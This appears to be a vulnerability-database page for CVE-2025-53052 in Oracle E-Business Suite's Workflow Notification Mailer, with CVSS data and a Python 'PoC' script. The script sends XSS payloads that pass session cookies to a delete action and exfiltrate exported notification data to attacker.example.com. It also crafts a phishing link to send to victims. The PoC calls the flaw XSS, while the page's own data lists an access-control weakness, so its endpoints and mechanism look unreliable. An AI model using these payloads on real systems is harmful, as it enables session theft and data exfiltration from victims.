Security Vulnerability Report
中文
CVE-2025-53052 CVSS 6.1 MEDIUM

CVE-2025-53052

Published: 2025-10-21 20:20:43
Last Modified: 2025-10-23 16:06:12
Source: [email protected]

Description

Vulnerability in the Oracle Workflow product of Oracle E-Business Suite (component: Workflow Notification Mailer). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Workflow. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Workflow, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Workflow accessible data as well as unauthorized read access to a subset of Oracle Workflow accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:workflow:*:*:*:*:*:*:*:* - VULNERABLE
Oracle E-Business Suite 12.2.3
Oracle E-Business Suite 12.2.4
Oracle E-Business Suite 12.2.5
Oracle E-Business Suite 12.2.6
Oracle E-Business Suite 12.2.7
Oracle E-Business Suite 12.2.8
Oracle E-Business Suite 12.2.9
Oracle E-Business Suite 12.2.10
Oracle E-Business Suite 12.2.11
Oracle E-Business Suite 12.2.12
Oracle E-Business Suite 12.2.13
Oracle E-Business Suite 12.2.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-53052 - Oracle Workflow Notification Mailer XSS PoC # Vulnerability: Reflected/Stored XSS in Oracle Workflow Notification Mailer # Affected: Oracle E-Business Suite 12.2.3 - 12.2.14 import requests TARGET_URL = "https://target-oracle-ebs.example.com/OA_HTML/OA.jsp" # Oracle Workflow Notification Mailer endpoint NOTIFICATION_ENDPOINT = "/OA_HTML/wf_notification_mailer.jsp" def exploit_xss(base_url, param_name="notificationId", payload=None): """ Exploit reflected XSS in Oracle Workflow Notification Mailer The notificationId or similar parameter is reflected without proper sanitization """ if payload is None: # XSS payload to steal session data or perform unauthorized actions payload = ( '<script>' 'var xhr = new XMLHttpRequest();' 'xhr.open("POST", "/OA_HTML/wf_update_data.jsp", true);' 'xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");' 'xhr.send("action=delete&item=" + document.cookie);' '</script>' ) # Craft the malicious URL params = {param_name: payload} malicious_url = f"{base_url}{NOTIFICATION_ENDPOINT}" print(f"[*] Malicious URL: {malicious_url}") print(f"[*] Payload parameter: {param_name}={payload}") # Verify the endpoint is vulnerable response = requests.get(malicious_url, params=params, verify=False) if payload in response.text: print("[+] Target appears vulnerable! Payload reflected in response.") print("[+] Send this URL to a victim user to trigger the XSS attack.") return True else: print("[-] Payload not reflected. Target may not be vulnerable or WAF is in place.") return False def craft_phishing_link(base_url): """ Craft a phishing link to be sent to the victim """ payload = "javascript:fetch('/OA_HTML/wf_notif_data?export=true',{credentials:'same-origin'}).then(r=>r.text()).then(d=>fetch('https://attacker.example.com/steal?d='+btoa(d)))" link = f"{base_url}{NOTIFICATION_ENDPOINT}?redirect={payload}" print(f"[*] Phishing link: {link}") return link if __name__ == "__main__": exploit_xss(TARGET_URL) craft_phishing_link(TARGET_URL)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53052", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:43.303", "lastModified": "2025-10-23T16:06:11.647", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Workflow product of Oracle E-Business Suite (component: Workflow Notification Mailer). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Workflow. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Workflow, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Workflow accessible data as well as unauthorized read access to a subset of Oracle Workflow accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:workflow:*:*:*:*:*:*:*:*", "versionStartIncluding": "12.2.3", "versionEndIncluding": "12.2.14", "matchCriteriaId": "B8EDFF6B-489B-48D0-8B48-B3E8F9FBCD7C"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.